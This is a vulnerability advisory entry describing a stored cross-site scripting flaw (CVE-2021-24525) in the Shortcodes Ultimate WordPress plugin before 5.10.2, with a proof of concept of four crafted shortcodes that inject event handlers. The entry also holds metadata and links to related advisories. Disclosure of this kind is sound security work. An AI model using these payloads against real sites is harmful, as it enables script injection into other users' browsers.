Shortcodes Ultimate < 5.10.2 – Contributor+ Stored XSS | CVE 2021-24525 | Plugin Vulnerabilities

Description

The plugin allows users with Contributor roles to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some do escape, most don't, and there are even some attributes that are insecure by design (like [su_button]'s onclick attribute).

Proof of Concept

[su_accordion class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)']
[su_animate duration='1s;animation-name:twentytwentyone-close-button-transition;' type='" onanimationend="alert(2)']
[su_audio width='1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//' url="a"]
[su_box color='red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//']

Affects Plugins

shortcodes-ultimate

Fixed in 5.10.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

7f5659bd-50c3-4725-95f4-cf88812acf1c

Timeline

Publicly Published

2021-08-23 (about 4 years ago)

Added

2021-08-23 (about 4 years ago)

Last Updated

2022-03-07 (about 3 years ago)

Other

Published

Title

Published

2025-01-30

Title

Shared Files – Frontend File Upload Form & Secure File Sharing < 1.7.43 - Limited Unauthenticated Stored Cross-Site Scripting via File Upload

Published

2023-01-06

Title

Posts List Designer by Category < 3.2 - Contributor+ Stored XSS via Shortcode

Published

2020-05-16

Title

Team Members < 5.0.4 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2025-11-10

Title

Squirrels Auto Inventory <= 1.0.3 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2025-08-17

Title

Contact Info Widget <= 2.6.2 - Authenticated (Administrator+) Stored Cross-Site Scripting